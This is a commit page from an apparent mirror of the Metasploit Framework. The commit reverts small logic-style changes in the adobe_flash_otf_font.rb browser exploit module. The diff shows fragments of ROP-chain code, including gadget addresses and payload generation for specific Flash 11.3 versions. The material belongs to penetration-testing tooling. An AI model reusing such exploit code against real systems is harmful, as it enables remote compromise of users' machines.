infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

undo logic changes in adobe_flas_otf_font

bug/bundler_fix
Brent Cook 2016-03-16 09:52:21 -05:00
parent 44e1fefa2e
commit d70308f76e
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/windows/browser/adobe_flash_otf_font.rb
View File

@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
return p
end
if !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,257/
if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/
print_status("Using Rop Chain For Flash: #{flash_version}")
pivot = [
0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,265/
elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/
print_status("Using Rop Chain For Flash: #{flash_version}")
pivot = [
0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,268/
elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/
print_status("Using Rop Chain For Flash: #{flash_version}")
pivot = [
0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)